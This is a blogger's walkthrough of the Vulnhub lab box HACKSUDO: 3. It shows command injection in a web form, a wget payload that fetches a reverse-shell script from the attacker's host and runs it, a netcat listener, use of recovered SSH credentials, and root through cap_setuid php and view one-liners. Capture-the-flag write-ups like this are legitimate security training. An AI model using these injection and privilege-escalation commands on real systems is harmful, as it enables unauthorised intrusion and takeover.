Vulnhub: HACKSUDO: 3

HACKSUDO: 3

This is HACKSUDO: 3 from Vulnhub. It says:

This box should be easy . This machine was created for the InfoSec Prep Discord Server (https://discord.gg/tsEQqDJh), and
Find the user.txt and root.txt flag submit it to the mybox channel on Discord and get chance to get hacksudo machine hacking course free

I don’t normally post these anywhere but hey, maybe I will this time.

Ports

LOL. The first time I scanned this I only had a web port (HTTP on 80). After I completed it I scanned it again and SSH was open. Whaaaaaat? I don’t think I opened it; maybe I was too quick on the scan. Whatever, we start with web.

HTTP/80

The website has a few things on it; it mostly presents as a copy of a github project but some enumeration reveals javascript files related to games and a few PHP files including info.php, login.php and generator.php. We don’t have any credentials so I ignore login.php; I run a bunch of feroxbuster scans but I don’t find anything interesting.

generator.php

This is a page that allows you to enter a name, which it then renders in ASCII art. Neat. It is also command injectable; eg:

name && id

Which produces:

‘name’ as ASCII art, and
uid=33(www-data) gid=33(www-data) groups=33(www-data)

I try a few one-liner reverse shells but I can’t get one to fire. I try using echo to write a file on the webserver; the file gets created but it’s empty. I try with printf; same thing. Next I try using curl and wget to retrieve a shell from my box, eg (this is from Burp Suite):

ip=id && wget http://192.168.1.192:9090/cmd.php -O /var/www/html/cmd.php&submit=submit

This will create the file, but it’s empty, so no bueno. I try again but placing the file in the /tmp directory; still empty. I try /dev/shm - success! The sequence is:

Upload the file (this was just a bash reverse shell):

ip=id && wget http://192.168.1.192:9090/shell.sh -O /dev/shm/shell.sh

Now make it executable:

ip=id && chmod x /dev/shm/shell.sh&submit=submit

And now call it:

ip=id && /dev/shm/shell.sh&submit=submit

And in my listener:

┌──(root💀kali)-[/opt/vulnhub/hacksudo3]
└─# nc -nvlp 1234                                                                       
listening on [any] 1234 ...
connect to [192.168.1.192] from (UNKNOWN) [192.168.1.201] 40924
bash: cannot set terminal process group (735): Inappropriate ioctl for device
bash: no job control in this shell
www-data@hacksudo:/var/www/html$

hacksudo

I have a look in the webserver; turns out my feroxbuster searches found most of the content. I check login.php and find this line:

you have logged in successfully , 0x Open The Next Door key is = GMYTGMBTGAZTAMZRGIYDGMJTGAZTAMZQGMZDEMBTGEZTAMZQGMYDGMY=

But even now I’ve rooted the box I’m still not sure what that means.

One level up in /var/www, we find this:

www-data@hacksudo:/var/www$ ls -alsh
ls -alsh
total 16K
4.0K drwxr-xr-x  3 www-data www-data 4.0K Apr 15 12:13 .
4.0K drwxr-xr-x 14 root     root     4.0K Mar 19 07:57 ..
   0 -rw-r--r--  1 www-data www-data    0 Apr 15 12:13 .wget-hsts
4.0K -rwxrwxr--  1 www-data www-data  176 Mar 20 11:31 hacksudo
4.0K drwxr-xr-x  6 www-data www-data 4.0K Apr 15 12:18 html
www-data@hacksudo:/var/www$ file hacksudo
file hacksudo
hacksudo: ASCII text

I won’t reproduce it here, but we have a ROT13 encoded file, which contains SSH credentials for hacksudo (the password is hashed, but John deals with it).

But, we had no open SSH port? What about internally? Yes. I couldn’t get it to work with the normal commands but using IPv6 it was ok, not sure if that was intentional or not.

www-data@hacksudo:/var/www$ ssh -6 hacksudo@localhost
ssh -6 hacksudo@localhost
Could not create directory '/var/www/.ssh'.
The authenticity of host 'localhost (::1)' can't be established.
ECDSA key fingerprint is SHA256:DQGgjBAkTgrLHL8x9i2t/g6vbx0ASKgtWdGRHLbrXrU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
yes
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).
hacksudo@localhost's password: vishal

Welcome to Ubuntu 20.10 (GNU/Linux 5.8.0-45-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Apr 15 12:24:32 PM UTC 2021

  System load:  0.0               Processes:               120
  Usage of /:   94.9% of 6.82GB   Users logged in:         0
  Memory usage: 41%               IPv4 address for enp0s3: 192.168.1.201
  Swap usage:   0%

  => / is using 94.9% of 6.82GB

 * Introducing self-healing high availability clusters in MicroK8s.
   Simple, hardened, Kubernetes for production, from RaspberryPi to DC.

     https://microk8s.io/high-availability

45 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Wed Mar 24 09:02:25 2021 from 192.168.0.7
hacksudo@hacksudo:~$ sudo -l
sudo -l
[sudo] password for hacksudo: vishal

Sorry, user hacksudo may not run sudo on hacksudo.

root

There are multiple ways of escalating to root on this box and I know that because after I’d done this, I watched a YouTube video of someone else doing the box and he used the LXD privesc which was much more complicated than what I did.

Linpeas points this out:

Files with capabilities:
/home/hacksudo/locker/php cap_setuid=ep
/home/hacksudo/locker/php cap_setuid=ep is writable

And GTFOBins lights the way:

hacksudo@hacksudo:~/locker$ CMD="/bin/sh"
CMD="/bin/sh"
hacksudo@hacksudo:~/locker$ ./php -r "posix_setuid(0); system('$CMD');"
./php -r "posix_setuid(0); system('$CMD');"
id;hostname;date
uid=0(root) gid=1000(hacksudo) groups=1000(hacksudo),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
hacksudo
Thu Apr 15 12:32:37 PM UTC 2021
cat root.txt
7db64dc8077ff8f969938bc48bd0a9ab
cat proof.txt
you successfully rooted hacksudo3 box !!!

Cool.

Since I knew there was at least one other method for getting root, I went to look to see if I could find another one. I noticed linpeas pointed out that view also had the cap_setuid capability. Would that work - we have a method at GTFObins?

Yes, it does work - with a slight modification. Note; there are several different view binaries on the box. We want this one:

/home/hacksudo/view cap_setuid=ep

Trying it directly (more or less) from GTFObins:

hacksudo@hacksudo:~$ ./view -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

provokes this error:

reset: unknown terminal type unknown

In order to fix this, I changed a few things. Firstly, SSH with -t (this may not have been necessary):

www-data@hacksudo:/var/www/html$ ssh -6 -t hacksudo@localhost

Next, check (and then set) TERM:

hacksudo@hacksudo:~$ echo $TERM
echo $TERM
dumb
hacksudo@hacksudo:~$ export TERM=xterm-256color
export TERM=xterm-256color
hacksudo@hacksudo:~$ echo $TERM
echo $TERM
xterm-256color

And finally:

hacksudo@hacksudo:~$ ./view -c ':python3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

Boom.

# id;hostname;date
id;hostname;date
uid=0(root) gid=1000(hacksudo) groups=1000(hacksudo),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
hacksudo
Thu Apr 15 01:21:40 PM UTC 2021

So; two ways to root and both different to the video I watched.